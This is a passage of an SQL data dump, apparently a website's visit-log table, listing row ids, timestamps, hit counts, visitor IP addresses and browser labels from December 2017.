1512942243,1,1,0,0,'66.249.64.29','chrome'),(186006,1512944255,1,0,1,0,'66.249.70.25',''),(186007,1512944661,1,1,0,0,'8.29.198.25','other'),(186008,1512945166,1,1,0,0,'157.55.39.239','other'),(186009,1512947294,1,1,0,0,'94.254.129.34','chrome'),(186010,1512947355,2,2,0,0,'141.8.142.74','other'),(186011,1512947701,1,1,0,0,'157.55.39.250','other'),(186012,1512948336,1,1,0,0,'217.69.133.18','other'),(186013,1512949020,1,1,0,0,'51.255.66.102','other'),(186014,1512951742,1,1,0,0,'141.8.142.74','other'),(186015,1512951956,1,1,0,0,'66.249.64.29','chrome'),(186016,1512952639,1,1,0,0,'178.154.171.88','other'),(186017,1512952764,1,0,1,0,'66.249.70.27',''),(186018,1512953601,1,0,1,0,'66.249.64.29',''),(186019,1512954320,1,1,0,0,'40.77.167.117','other'),(186020,1512954686,1,0,1,0,'66.249.64.30',''),(186021,1512955504,1,1,0,0,'8.29.198.27','other'),(186022,1512955517,1,1,0,0,'141.8.142.74','other'),(186023,1512956084,1,1,0,0,'178.154.171.88','other'),(186024,1512956451,1,1,0,0,'66.249.64.29','chrome'),(186025,1512957112,1,1,0,0,'157.55.39.203','other'),(186026,1512957263,1,1,0,0,'217.69.133.13','other'),(186027,1512957779,1,1,0,0,'46.201.134.39','chrome'),(186028,1512958137,1,1,0,0,'40.77.167.88','other'),(186029,1512959896,1,1,0,0,'54.165.59.7','other'),(186030,1512960580,1,0,1,0,'66.249.64.30',''),(186031,1512961641,1,1,0,0,'54.165.59.7','other'),(186032,1512962133,1,1,0,0,'141.8.142.74','other'),(186033,1512964312,1,1,0,0,'157.55.39.239','other'),(186034,1512964648,1,1,0,0,'40.77.167.175','other'),(186035,1512964931,1,1,0,0,'13.56.229.65','chrome'),(186036,1512965621,1,1,0,0,'217.69.133.227','other'),(186037,1512966356,1,1,0,0,'8.29.198.26','other'),(186038,1512966830,1,0,1,0,'66.249.64.29',''),(186039,1512967819,1,1,0,0,'37.52.23.73','chrome'),(186040,1512967902,2,2,0,0,'40.77.167.88','other'),(186041,1512968473,1,1,0,0,'217.69.133.220','other'),(186042,1512969639,1,1,0,0,'207.46.13.95','other'),(186043,1512973589,1,1,0,0,'91.196.178.69','chrome'),(186044,1512974063,1,1,0,0,'91.196.178.70','firefox'),(186045,1512974664,1,0,1,0,'66.249.64.28',''),(186046,1512975024,1,1,0,0,'178.154.171.88','other'),(186047,1512975176,1,1,0,0,'91.196.179.33','firefox'),(186048,1512975525,2,2,0,0,'91.196.178.67','chrome'),(186049,1512975608,1,1,0,0,'217.69.133.250','other'),(186050,1512975921,1,1,0,0,'91.196.178.165','chrome'),(186051,1512975982,1,1,0,0,'66.249.64.30','chrome'),(186052,1512976478,1,1,0,0,'91.196.178.69','chrome'),(186053,1512976947,1,1,0,0,'91.196.177.46','chrome'),(186054,1512977199,1,1,0,0,'8.29.198.26','other'),(186055,1512977735,1,1,0,0,'66.249.64.28','chrome'),(186056,1512977909,1,1,0,0,'91.196.177.15','chrome'),(186057,1512978050,1,1,0,0,'217.69.133.243','other'),(186058,1512978139,1,1,0,0,'91.203.26.166','chrome'),(186059,1512978525,1,1,0,0,'91.196.178.67','chrome'),(186060,1512978616,1,1,0,0,'217.69.136.206','other'),(186061,1512978712,1,1,0,0,'141.8.142.74','other'),(186062,1512978972,1,1,0,0,'95.132.63.74','firefox'),(186063,1512979690,1,1,0,0,'178.54.190.249','chrome'),(186064,1512979817,1,1,0,0,'217.69.133.245','other'),(186065,1512980174,1,1,0,0,'91.196.178.168','chrome'),(186066,1512980235,1,1,0,0,'91.196.178.71','firefox'),(186067,1512980338,1,1,0,0,'91.196.178.162','chrome'),(186068,1512980389,2,2,0,0,'95.213.141.124','opera'),(186069,1512980670,1,0,1,0,'66.249.64.30',''),(186070,1512980759,2,2,0,0,'91.196.178.71','chrome'),(186071,1512981693,1,1,0,0,'217.69.133.218','other'),(186072,1512981864,1,1,0,0,'91.196.177.15','chrome'),(186073,1512982178,1,1,0,0,'91.196.178.65','chrome'),(186074,1512982452,1,0,1,0,'66.249.64.29',''),(186075,1512982747,1,1,0,0,'91.196.178.71','chrome'),(186076,1512983151,1,1,0,0,'178.93.253.118','chrome'),(186077,1512983486,1,1,0,0,'94.178.125.183','chrome'),(186078,1512983837,2,2,0,0,'141.8.142.74','other'),(186079,1512983872,1,1,0,0,'95.24.5.231','msie'),(186080,1512984035,1,1,0,0,'157.55.39.239','other'),(186081,1512984473,1,1,0,0,'109.63.192.141','msie'),(186082,1512985432,1,1,0,0,'217.69.136.210','other'),(186083,1512986085,1,1,0,0,'91.196.178.71','firefox'),(186084,1512986134,1,1,0,0,'109.63.197.80','msie'),(186085,1512986258,1,1,0,0,'91.196.178.65','firefox'),(186086,1512986370,1,1,0,0,'91.196.178.65','chrome'),(186087,1512986833,1,0,1,0,'66.249.64.29',''),(186088,1512988043,1,1,0,0,'8.29.198.25','other'),(186089,1512989704,1,1,0,0,'207.46.13.63','other'),(186090,1512990010,1,1,0,0,'46.161.9.39','firefox'),(186091,1512990087,2,2,0,0,'91.196.178.71','chrome'),(186092,1512990170,1,1,0,0,'93.171.185.119','firefox'),(186093,1512991666,1,1,0,0,'91.196.178.162','chrome'),(186094,1512991932,1,1,0,0,'77.222.134.100','firefox'),(186095,1512992151,1,1,0,0,'91.196.179.33','firefox'),(186096,1512992179,1,1,0,0,'91.196.178.68','firefox'),(186097,1512992488,1,1,0,0,'37.204.153.61','msie'),(186098,1512992517,1,1,0,0,'37.55.228.244','chrome'),(186099,1512993440,1,1,0,0,'91.196.177.46','firefox'),(186100,1512993590,1,1,0,0,'91.196.178.165','chrome'),(186101,1512993603,1,1,0,0,'91.196.178.36','chrome'),(186102,1512994201,1,1,0,0,'141.8.142.74','other'),(186103,1512996873,2,2,0,0,'91.196.178.99','chrome'),(186104,1512996994,1,1,0,0,'185.63.255.201','chrome'),(186105,1512997298,1,1,0,0,'178.154.171.88','other'),(186106,1512998890,1,1,0,0,'8.29.198.27','other'),(186107,1512998998,1,0,1,0,'66.249.64.28',''),(186108,1512999069,1,1,0,0,'141.8.142.74','other'),(186109,1512999259,1,1,0,0,'193.107.179.221','chrome'),(186110,1512999498,1,1,0,0,'91.196.178.67','chrome'),(186111,1513000021,1,1,0,0,'94.254.129.34','chrome'),(186112,1513000178,1,1,0,0,'91.124.40.9','chrome'),(186113,1513000483,1,0,1,0,'66.249.64.30',''),(186114,1513000748,1,1,0,0,'188.166.47.168','chrome'),(186115,1513000859,1,1,0,0,'141.8.142.74','other'),(186116,1513001097,1,1,0,0,'194.44.79.193','chrome'),(186117,1513001593,1,1,0,0,'178.121.228.52','chrome'),(186118,1513001950,5,5,0,0,'141.8.142.74','other'),(186119,1513002115,1,1,0,0,'91.196.178.166','chrome'),(186120,1513002224,1,1,0,0,'80.252.154.233','chrome'),(186121,1513002273,1,1,0,0,'195.16.76.240','chrome'),(186122,1513002339,1,1,0,0,'91.225.4.7','chrome'),(186123,1513002427,1,1,0,0,'157.55.39.239','other'),(186124,1513003449,1,1,0,0,'141.8.142.74','other'),(186125,1513003725,1,1,0,0,'213.179.252.223','chrome'),(186126,1513004005,1,1,0,0,'91.196.178.65','chrome'),(186127,1513004213,1,1,0,0,'91.196.177.156','chrome'),(186128,1513004511,1,1,0,0,'91.196.178.71','chrome'),(186129,1513004700,1,0,1,0,'66.249.64.29',''),(186130,1513005297,1,1,0,0,'91.196.178.68','firefox'),(186131,1513005966,2,2,0,0,'141.8.142.74','other'),(186132,1513006076,1,1,0,0,'199.58.86.209','other'),(186133,1513006610,1,1,0,0,'37.73.207.94','chrome'),(186134,1513007856,1,1,0,0,'141.8.142.74','other'),(186135,1513008290,1,1,0,0,'207.46.13.63','other'),(186136,1513008734,1,1,0,0,'136.243.70.68','chrome'),(186137,1513009745,1,1,0,0,'8.29.198.25','other'),(186138,1513009801,1,0,1,0,'68.180.229.52',''),(186139,1513009815,1,1,0,0,'54.165.59.7','other'),(186140,1513010160,1,1,0,0,'37.54.17.143','chrome'),(186141,1513010320,2,2,0,0,'178.154.171.88','other'),(186142,1513012023,1,0,1,0,'66.249.64.30',''),(186143,1513012954,2,2,0,0,'51.15.136.98','chrome'),(186144,1513013336,1,1,0,0,'217.69.133.250','other'),(186145,1513013910,1,1,0,0,'91.196.178.58','chrome'),(186146,1513013911,1,1,0,0,'31.13.113.178','other'),(186147,1513015999,2,2,0,0,'106.120.151.116','firefox'),(186148,1513016097,1,1,0,0,'91.196.178.18','chrome'),(186149,1513016316,1,1,0,0,'185.30.202.117','chrome'),(186150,1513016999,2,2,0,0,'178.154.171.86','other'),(186151,1513018123,1,1,0,0,'107.167.104.238','other'),(186152,1513018622,1,1,0,0,'213.180.203.37','other'),(186153,1513019041,1,1,0,0,'185.63.255.201','chrome'),(186154,1513019360,1,1,0,0,'217.69.133.30','other'),(186155,1513019856,1,1,0,0,'91.196.178.68','firefox'),(186156,1513020545,1,1,0,0,'91.196.178.18','chrome'),(186157,1513020583,1,1,0,0,'8.29.198.25','other'),(186158,1513020599,1,0,1,0,'66.249.70.25',''),(186159,1513021443,1,0,1,0,'66.249.64.29',''),(186160,1513022085,1,1,0,0,'91.196.178.18','chrome'),(186161,1513023270,1,0,1,0,'66.249.64.29',''),(186162,1513024042,1,1,0,0,'217.69.133.231','other'),(186163,1513028161,1,1,0,0,'40.77.167.19','other'),(186164,1513028717,1,0,1,0,'66.249.70.27',''),(186165,1513029687,1,1,0,0,'217.69.133.13','other'),(186166,1513031428,1,1,0,0,'8.29.198.26','other'),(186167,1513031499,1,1,0,0,'52.48.11.199','other'),(186168,1513031648,1,1,0,0,'66.249.70.27','chrome'),(186169,1513031659,1,1,0,0,'66.249.64.30','chrome'),(186170,1513032071,1,1,0,0,'217.69.133.247','other'),(186171,1513034168,1,0,1,0,'66.249.70.25',''),(186172,1513034737,1,1,0,0,'217.69.133.67','other'),(186173,1513037410,54,54,0,0,'88.198.55.175','other'),(186174,1513038736,1,1,0,0,'46.161.9.39','chrome'),(186175,1513038842,1,1,0,0,'40.77.167.19','other'),(186176,1513040935,1,0,1,0,'66.249.64.29',''),(186177,1513042169,1,1,0,0,'46.161.9.39','chrome'),(186178,1513042274,1,1,0,0,'8.29.198.25','other'),(186179,1513044793,1,1,0,0,'157.55.39.165','other'),(186180,1513045255,1,1,0,0,'163.172.125.105','other'),(186181,1513045713,1,1,0,0,'40.77.167.30','other'),(186182,1513046519,1,1,0,0,'217.69.133.12','other'),(186183,1513047622,1,0,1,0,'66.249.64.29',''),(186184,1513048706,1,1,0,0,'217.69.133.70','other'),(186185,1513050111,1,1,0,0,'217.69.133.30','other'),(186186,1513050767,1,1,0,0,'46.42.165.226','chrome'),(186187,1513050812,1,1,0,0,'217.69.133.233','other'),(186188,1513052612,64,64,0,0,'52.48.11.199','other'),(186189,1513052846,1,0,1,0,'66.249.64.29',''),(186190,1513053114,1,1,0,0,'8.29.198.25','other'),(186191,1513053177,1,0,1,0,'66.249.70.27',''),(186192,1513053416,1,1,0,0,'66.249.64.28','chrome'),(186193,1513054479,1,1,0,0,'40.77.167.30','other'),(186194,1513054540,1,1,0,0,'157.55.39.165','other'),(186195,1513055619,1,1,0,0,'141.8.142.74','other'),(186196,1513055887,1,1,0,0,'188.163.16.13','other'),(186197,1513056394,39,39,0,0,'193.200.241.230','other'),(186198,1513057956,1,1,0,0,'217.69.133.239','other'),(186199,1513059139,1,1,0,0,'94.178.125.183','chrome'),(186200,1513059329,1,1,0,0,'91.196.178.71','firefox'),(186201,1513059555,44,44,0,0,'193.200.241.230','other'),(186202,1513060271,1,1,0,0,'37.54.237.140','chrome'),(186203,1513060568,1,1,0,0,'91.196.178.71','firefox'),(186204,1513060915,1,1,0,0,'91.196.179.33','firefox'),(186205,1513061026,1,1,0,0,'217.69.133.230','other'),(186206,1513061657,1,1,0,0,'91.196.178.69','chrome'),(186207,1513062997,1,0,1,0,'66.249.64.30',''),(186208,1513063254,1,1,0,0,'95.132.58.139','firefox'),(186209,1513063618,1,1,0,0,'178.154.171.88','other'),(186210,1513063667,1,1,0,0,'157.55.39.178','other'),(186211,1513063680,2,2,0,0,'141.8.142.74','other'),(186212,1513063959,1,1,0,0,'8.29.198.27','other'),(186213,1513064095,1,1,0,0,'91.196.178.53','chrome'),(186214,1513064524,1,0,1,0,'68.180.229.52',''),(186215,1513064606,1,1,0,0,'217.69.133.228','other'),(186216,1513065499,1,1,0,0,'66.249.64.28','chrome'),(186217,1513066039,1,1,0,0,'91.196.178.162','chrome'),(186218,1513066274,1,1,0,0,'95.221.61.20','msie'),(186219,1513066400,2,2,0,0,'91.196.178.70','firefox'),(186220,1513066444,1,1,0,0,'157.55.39.178','other'),(186221,1513066830,1,1,0,0,'40.77.167.19','other'),(186222,1513067105,1,1,0,0,'66.249.64.28','chrome'),(186223,1513067272,2,2,0,0,'91.196.178.71','chrome'),(186224,1513067273,1,1,0,0,'91.196.178.67','chrome'),(186225,1513067333,1,1,0,0,'91.196.178.70','chrome'),(186226,1513067645,1,1,0,0,'93.78.222.60','chrome'),(186227,1513067683,1,1,0,0,'178.54.190.249','chrome'),(186228,1513068174,2,2,0,0,'141.8.142.74','other'),(186229,1513068556,1,1,0,0,'91.196.178.67','chrome'),(186230,1513068762,1,1,0,0,'157.55.39.178','other'),(186231,1513068954,1,1,0,0,'66.249.64.30','chrome'),(186232,1513069917,1,1,0,0,'78.111.185.172','chrome'),(186233,1513070100,1,1,0,0,'82.207.49.138','chrome'),(186234,1513070806,1,1,0,0,'217.69.133.228','other'),(186235,1513071453,1,1,0,0,'91.196.178.71','chrome'),(186236,1513071475,1,1,0,0,'94.178.130.85','chrome'),(186237,1513071569,1,1,0,0,'83.170.203.202','firefox'),(186238,1513071572,1,1,0,0,'141.8.142.74','other'),(186239,1513071615,1,1,0,0,'80.252.154.233','chrome'),(186240,1513071897,1,1,0,0,'91.196.177.15','chrome'),(186241,1513071954,1,1,0,0,'95.132.10.124','firefox'),(186242,1513072354,1,1,0,0,'195.10.210.70','chrome'),(186243,1513072693,1,1,0,0,'91.124.21.61','chrome'),(186244,1513072809,1,1,0,0,'91.196.178.71','chrome'),(186245,1513072869,1,1,0,0,'37.55.150.189','firefox'),(186246,1513072989,2,2,0,0,'151.80.44.115','other'),(186247,1513073460,2,0,2,0,'66.249.64.30',''),(186248,1513074072,1,1,0,0,'91.208.145.250','chrome'),(186249,1513074253,1,1,0,0,'107.21.1.8','other'),(186250,1513074279,1,1,0,0,'141.8.142.74','other'),(186251,1513074302,1,1,0,0,'94.153.197.114','chrome'),(186252,1513074476,1,0,1,0,'66.249.70.25',''),(186253,1513074577,1,1,0,0,'45.55.49.75','chrome'),(186254,1513074626,1,1,0,0,'91.124.1.194','firefox'),(186255,1513074811,1,1,0,0,'8.29.198.26','other'),(186256,1513074985,1,1,0,0,'94.178.166.154','chrome'),(186257,1513075099,1,1,0,0,'91.196.178.71','chrome'),(186258,1513075236,1,1,0,0,'141.8.142.74','other'),(186259,1513075919,1,0,1,0,'66.249.64.30',''),(186260,1513076995,1,1,0,0,'95.67.126.42','chrome'),(186261,1513077001,1,1,0,0,'91.196.177.46','chrome'),(186262,1513077049,1,1,0,0,'141.8.142.74','other'),(186263,1513077153,1,1,0,0,'178.154.171.88','other'),(186264,1513077160,1,1,0,0,'217.69.133.217','other'),(186265,1513077378,1,1,0,0,'91.196.178.163','chrome'),(186266,1513077427,2,2,0,0,'46.201.241.5','chrome'),(186267,1513077988,1,1,0,0,'91.196.177.46','chrome'),(186268,1513078258,1,1,0,0,'217.69.133.11','other'),(186269,1513078488,1,1,0,0,'178.154.171.88','other'),(186270,1513078632,1,1,0,0,'91.196.178.67','firefox'),(186271,1513078935,2,2,0,0,'141.8.142.74','other'),(186272,1513079396,1,0,1,0,'66.249.70.27',''),(186273,1513079578,8,8,0,0,'158.69.254.103','other'),(186274,1513080028,1,1,0,0,'94.178.164.105','chrome'),(186275,1513080174,1,1,0,0,'195.191.104.118','other'),(186276,1513080655,1,0,1,0,'66.249.64.30',''),(186277,1513080665,1,1,0,0,'178.154.171.88','other'),(186278,1513081131,1,1,0,0,'157.55.39.101','other'),(186279,1513081225,1,1,0,0,'217.69.133.253','other'),(186280,1513082111,1,0,1,0,'66.249.64.15',''),(186281,1513082298,1,1,0,0,'46.211.97.211','other'),(186282,1513082655,1,1,0,0,'141.8.142.74','other'),(186283,1513083604,1,1,0,0,'141.8.142.74','other'),(186284,1513084513,2,2,0,0,'91.196.177.46','chrome'),(186285,1513085661,1,1,0,0,'217.69.133.253','other'),(186286,1513085669,1,1,0,0,'8.29.198.26','other'),(186287,1513085868,1,1,0,0,'195.238.108.91','chrome'),(186288,1513086569,1,1,0,0,'91.196.178.168','chrome'),(186289,1513086702,1,1,0,0,'204.79.180.8','msie'),(186290,1513087097,1,1,0,0,'217.69.133.231','other'),(186291,1513087423,3,3,0,0,'141.8.142.74','other'),(186292,1513087593,1,0,1,0,'66.249.70.25',''),(186293,1513087873,1,1,0,0,'95.132.10.124','firefox'),(186294,1513088424,1,1,0,0,'91.196.178.67','chrome'),(186295,1513088908,1,0,1,0,'66.249.64.28',''),(186296,1513089192,1,1,0,0,'91.196.178.165','chrome'),(186297,1513089401,2,2,0,0,'37.52.18.138','chrome'),(186298,1513089532,1,1,0,0,'37.55.150.189','firefox'),(186299,1513089669,1,1,0,0,'91.196.178.67','chrome'),(186300,1513089779,1,1,0,0,'46.161.9.39','chrome'),(186301,1513090187,1,1,0,0,'194.44.50.151','chrome'),(186302,1513090219,1,1,0,0,'92.112.125.46','chrome'),(186303,1513090224,1,1,0,0,'141.8.142.74','other'),(186304,1513091032,1,0,1,0,'66.249.70.29',''),(186305,1513091485,1,1,0,0,'91.196.178.69','chrome'),(186306,1513091592,1,0,1,0,'66.249.64.29',''),(186307,1513091761,1,1,0,0,'141.8.142.74','other'),(186308,1513092754,1,1,0,0,'91.213.33.174','firefox'),(186309,1513093023,1,1,0,0,'37.55.224.21','chrome'),(186310,1513093065,1,1,0,0,'82.145.221.110','chrome'),(186311,1513093142,1,1,0,0,'82.145.220.196','chrome'),(186312,1513093422,1,1,0,0,'95.134.168.158','chrome'),(186313,1513093603,1,0,1,0,'66.249.64.29',''),(186314,1513093612,1,0,1,0,'66.249.64.28',''),(186315,1513093685,1,1,0,0,'162.210.196.129','other'),(186316,1513093784,1,1,0,0,'37.53.227.10','other'),(186317,1513094016,3,3,0,0,'141.8.142.74','other'),(186318,1513094039,1,1,0,0,'178.140.90.243','chrome'),(186319,1513094620,1,0,1,0,'66.249.64.29',''),(186320,1513094814,1,1,0,0,'178.92.233.135','chrome'),(186321,1513096019,1,1,0,0,'46.4.0.246','other'),(186322,1513096080,1,1,0,0,'91.196.178.51','chrome'),(186323,1513096419,4,4,0,0,'54.165.59.7','other'),(186324,1513096513,1,1,0,0,'8.29.198.25','other'),(186325,1513097391,1,1,0,0,'141.8.142.74','other'),(186326,1513097725,1,1,0,0,'188.166.36.222','chrome'),(186327,1513098025,1,1,0,0,'87.250.224.46','other'),(186328,1513098043,1,1,0,0,'66.249.64.29','chrome'),(186329,1513098193,1,0,1,0,'66.249.70.29',''),(186330,1513098526,1,1,0,0,'95.132.4.62','chrome'),(186331,1513098637,1,1,0,0,'94.254.246.216','chrome'),(186332,1513098941,1,1,0,0,'91.196.178.132','chrome'),(186333,1513099328,1,1,0,0,'87.250.224.46','other'),(186334,1513099343,1,0,1,0,'66.249.64.30',''),(186335,1513099587,2,0,2,0,'66.249.70.29',''),(186336,1513099690,1,0,1,0,'66.249.70.25',''),(186337,1513100256,1,1,0,0,'91.196.178.68','firefox'),(186338,1513100478,1,1,0,0,'141.8.142.74','other'),(186339,1513100901,1,1,0,0,'66.249.64.30','chrome'),(186340,1513100958,2,2,0,0,'178.154.171.88','other'),(186341,1513101308,1,1,0,0,'178.121.228.52','chrome'),(186342,1513101936,1,1,0,0,'141.8.142.74','other'),(186343,1513102286,1,1,0,0,'216.145.5.42','firefox'),(186344,1513102743,1,0,1,0,'66.249.64.28',''),(186345,1513102954,1,1,0,0,'37.52.61.52','chrome'),(186346,1513103142,1,1,0,0,'141.8.142.74','other'),(186347,1513103383,1,1,0,0,'178.154.171.88','other'),(186348,1513104556,1,1,0,0,'178.154.171.24','other'),(186349,1513104678,1,1,0,0,'91.196.178.69','chrome'),(186350,1513105035,1,1,0,0,'82.145.221.193','chrome'),(186351,1513105041,1,1,0,0,'141.8.142.74','other'),(186352,1513105046,1,1,0,0,'46.133.207.126','chrome'),(186353,1513105059,1,1,0,0,'95.132.222.50','chrome'),(186354,1513105080,1,1,0,0,'87.250.224.46','other'),(186355,1513105276,1,1,0,0,'157.55.39.165','other'),(186356,1513105423,1,1,0,0,'178.154.171.88','other'),(186357,1513106435,1,1,0,0,'40.77.167.196','other'),(186358,1513106678,1,1,0,0,'141.8.142.74','other'),(186359,1513107151,2,0,2,0,'66.249.64.30',''),(186360,1513107289,2,2,0,0,'81.213.191.29','other'),(186361,1513107349,1,1,0,0,'8.29.198.25','other'),(186362,1513108815,1,1,0,0,'178.154.171.88','other'),(186363,1513109549,1,1,0,0,'157.55.39.19','other'),(186364,1513110071,1,1,0,0,'141.8.142.74','other'),(186365,1513111255,2,2,0,0,'157.55.39.19','other'),(186366,1513111668,1,1,0,0,'141.8.142.74','other'),(186367,1513114828,1,1,0,0,'217.69.133.2','other'),(186368,1513115074,1,0,1,0,'66.249.66.201',''),(186369,1513115723,1,0,1,0,'66.249.66.195',''),(186370,1513116455,1,0,1,0,'66.249.66.201',''),(186371,1513116939,1,1,0,0,'157.55.39.165','other'),(186372,1513117187,1,0,1,0,'66.249.66.199',''),(186373,1513117259,1,1,0,0,'141.8.183.6','other'),(186374,1513118148,1,0,1,0,'66.249.66.195',''),(186375,1513118198,1,1,0,0,'8.29.198.27','other'),(186376,1513118247,1,1,0,0,'213.180.203.37','other'),(186377,1513118405,1,0,1,0,'66.249.66.201',''),(186378,1513119035,1,1,0,0,'91.233.90.10','chrome'),(186379,1513119492,1,1,0,0,'217.69.136.204','other'),(186380,1513119494,1,1,0,0,'217.69.136.207','other'),(186381,1513119543,1,1,0,0,'178.154.200.32','other'),(186382,1513119724,2,2,0,0,'178.154.171.86','other'),(186383,1513119878,1,1,0,0,'178.154.171.34','other'),(186384,1513119921,1,1,0,0,'213.180.203.37','other'),(186385,1513121060,2,2,0,0,'62.210.101.104','other'),(186386,1513121292,10,10,0,0,'69.58.178.57','other'),(186387,1513121532,2,2,0,0,'178.154.171.86','other'),(186388,1513121650,1,1,0,0,'213.180.203.37','other'),(186389,1513122497,4,4,0,0,'178.154.171.86','other'),(186390,1513123043,2,2,0,0,'213.180.203.37','other'),(186391,1513123088,1,1,0,0,'178.154.200.32','other'),(186392,1513123230,1,0,1,0,'66.249.66.157',''),(186393,1513123310,2,2,0,0,'178.154.171.34','other'),(186394,1513123318,6,6,0,0,'173.208.157.186','other'),(186395,1513123338,1,1,0,0,'40.77.167.128','other'),(186396,1513123458,1,1,0,0,'178.154.171.42','other'),(186397,1513124405,7,7,0,0,'46.229.168.66','other'),(186398,1513124410,1,1,0,0,'46.229.168.67','other'),(186399,1513124436,5,5,0,0,'46.229.168.68','other'),(186400,1513124469,2,2,0,0,'46.229.168.76','other'),(186401,1513124483,4,4,0,0,'46.229.168.78','other'),(186402,1513124551,5,5,0,0,'46.229.168.72','other'),(186403,1513124572,7,7,0,0,'46.229.168.65','other'),(186404,1513124599,5,5,0,0,'46.229.168.80','other'),(186405,1513124635,5,5,0,0,'46.229.168.74','other'),(186406,1513124720,4,4,0,0,'46.229.168.69','other'),(186407,1513124801,7,7,0,0,'46.229.168.79','other'),(186408,1513124843,5,5,0,0,'46.229.168.71','other'),(186409,1513124928,3,3,0,0,'46.229.168.77','other'),(186410,1513125104,7,7,0,0,'46.229.168.73','other'),(186411,1513125392,6,6,0,0,'46.229.168.68','other'),(186412,1513125404,5,5,0,0,'46.229.168.70','other'),(186413,1513125430,4,4,0,0,'46.229.168.76','other'),(186414,1513125469,5,5,0,0,'46.229.168.72','other'),(186415,1513125506,6,6,0,0,'46.229.168.66','other'),(186416,1513125573,2,2,0,0,'46.229.168.78','other'),(186417,1513125613,4,4,0,0,'46.229.168.67','other'),(186418,1513125675,2,2,0,0,'46.229.168.74','other'),(186419,1513125709,3,3,0,0,'46.229.168.79','other'),(186420,1513125801,7,7,0,0,'46.229.168.80','other'),(186421,1513125837,5,5,0,0,'46.229.168.65','other'),(186422,1513125951,3,3,0,0,'46.229.168.69','other'),(186423,1513126079,6,6,0,0,'46.229.168.73','other'),(186424,1513126101,3,3,0,0,'46.229.168.77','other'),(186425,1513126131,1,0,1,0,'66.249.66.155',''),(186426,1513126373,4,4,0,0,'46.229.168.68','other'),(186427,1513126414,3,3,0,0,'46.229.168.72','other'),(186428,1513126467,1,0,1,0,'66.249.66.156',''),(186429,1513126500,8,8,0,0,'46.229.168.76','other'),(186430,1513126521,3,3,0,0,'46.229.168.70','other'),(186431,1513126542,6,6,0,0,'46.229.168.71','other'),(186432,1513126733,5,5,0,0,'46.229.168.78','other'),(186433,1513126800,3,3,0,0,'46.229.168.65','other'),(186434,1513126893,2,2,0,0,'46.229.168.67','other'),(186435,1513126912,3,3,0,0,'46.229.168.80','other'),(186436,1513126991,2,2,0,0,'46.229.168.79','other'),(186437,1513127028,6,6,0,0,'46.229.168.74','other'),(186438,1513127037,5,5,0,0,'46.229.168.77','other'),(186439,1513127210,5,5,0,0,'46.229.168.69','other'),(186440,1513127267,9,9,0,0,'46.229.168.73','other'),(186441,1513127325,3,3,0,0,'46.229.168.68','other'),(186442,1513127346,5,5,0,0,'46.229.168.72','other'),(186443,1513127527,1,1,0,0,'46.229.168.70','other'),(186444,1513127559,8,8,0,0,'46.229.168.75','other'),(186445,1513127661,4,4,0,0,'46.229.168.78','other'),(186446,1513127669,1,1,0,0,'46.161.9.39','chrome'),(186447,1513127733,5,5,0,0,'46.229.168.71','other'),(186448,1513127747,4,4,0,0,'46.229.168.76','other'),(186449,1513127801,5,5,0,0,'46.229.168.67','other'),(186450,1513127898,5,5,0,0,'46.229.168.65','other'),(186451,1513127994,2,2,0,0,'46.229.168.74','other'),(186452,1513128140,5,5,0,0,'46.229.168.69','other'),(186453,1513128195,6,6,0,0,'46.229.168.73','other'),(186454,1513128375,7,7,0,0,'46.229.168.68','other'),(186455,1513128395,3,3,0,0,'46.229.168.80','other'),(186456,1513128489,1,1,0,0,'46.229.168.70','other'),(186457,1513128614,1,0,1,0,'66.249.66.76',''),(186458,1513128661,3,3,0,0,'46.229.168.77','other'),(186459,1513128697,15,15,0,0,'46.229.168.71','other'),(186460,1513128711,5,5,0,0,'46.229.168.72','other'),(186461,1513128771,5,5,0,0,'46.229.168.76','other'),(186462,1513128830,6,6,0,0,'46.229.168.66','other'),(186463,1513128866,1,1,0,0,'46.229.168.67','other'),(186464,1513128967,5,5,0,0,'46.229.168.74','other'),(186465,1513129006,1,0,1,0,'66.249.66.156',''),(186466,1513129014,5,5,0,0,'46.229.168.78','other'),(186467,1513129037,1,1,0,0,'8.29.198.27','other'),(186468,1513129181,7,7,0,0,'46.229.168.69','other'),(186469,1513129302,4,4,0,0,'46.229.168.79','other'),(186470,1513129466,6,6,0,0,'46.229.168.80','other'),(186471,1513129611,6,6,0,0,'46.229.168.73','other'),(186472,1513129632,5,5,0,0,'46.229.168.71','other'),(186473,1513129734,6,6,0,0,'46.229.168.77','other'),(186474,1513129800,4,4,0,0,'46.229.168.72','other'),(186475,1513129822,5,5,0,0,'46.229.168.66','other'),(186476,1513129886,5,5,0,0,'46.229.168.68','other'),(186477,1513129929,5,5,0,0,'46.229.168.76','other'),(186478,1513129940,7,7,0,0,'46.229.168.67','other'),(186479,1513129963,4,4,0,0,'46.229.168.65','other'),(186480,1513129969,1,1,0,0,'195.238.108.89','chrome'),(186481,1513130038,3,3,0,0,'46.229.168.78','other'),(186482,1513130118,6,6,0,0,'46.229.168.69','other'),(186483,1513130389,6,6,0,0,'46.229.168.79','other'),(186484,1513130444,2,2,0,0,'46.229.168.80','other'),(186485,1513130467,5,5,0,0,'46.229.168.74','other'),(186486,1513130533,6,6,0,0,'46.229.168.71','other'),(186487,1513130612,10,10,0,0,'46.229.168.73','other'),(186488,1513130739,7,7,0,0,'46.229.168.66','other'),(186489,1513130996,3,3,0,0,'46.229.168.78','other'),(186490,1513131067,4,4,0,0,'46.229.168.69','other'),(186491,1513131100,5,5,0,0,'46.229.168.68','other'),(186492,1513131114,5,5,0,0,'46.229.168.75','other'),(186493,1513131153,5,5,0,0,'46.229.168.70','other'),(186494,1513131158,2,2,0,0,'46.229.168.72','other'),(186495,1513131196,2,2,0,0,'46.229.168.76','other'),(186496,1513131293,6,6,0,0,'46.229.168.77','other'),(186497,1513131307,6,6,0,0,'46.229.168.79','other'),(186498,1513131405,1,0,1,0,'66.249.66.74',''),(186499,1513131406,4,4,0,0,'46.229.168.74','other'),(186500,1513131459,2,2,0,0,'46.229.168.67','other'),(186501,1513131478,5,5,0,0,'46.229.168.71','other'),(186502,1513131626,1,1,0,0,'217.69.133.252','other'),(186503,1513131752,5,5,0,0,'46.229.168.80','other'),(186504,1513131853,5,5,0,0,'46.229.168.73','other'),(186505,1513131949,4,4,0,0,'46.229.168.65','other'),(186506,1513131959,1,0,1,0,'68.180.229.104',''),(186507,1513132004,2,2,0,0,'46.229.168.66','other'),(186508,1513132043,4,4,0,0,'46.229.168.68','other'),(186509,1513132057,2,2,0,0,'46.229.168.78','other'),(186510,1513132093,4,4,0,0,'46.229.168.69','other'),(186511,1513132133,7,7,0,0,'46.229.168.70','other'),(186512,1513132172,2,2,0,0,'46.229.168.72','other')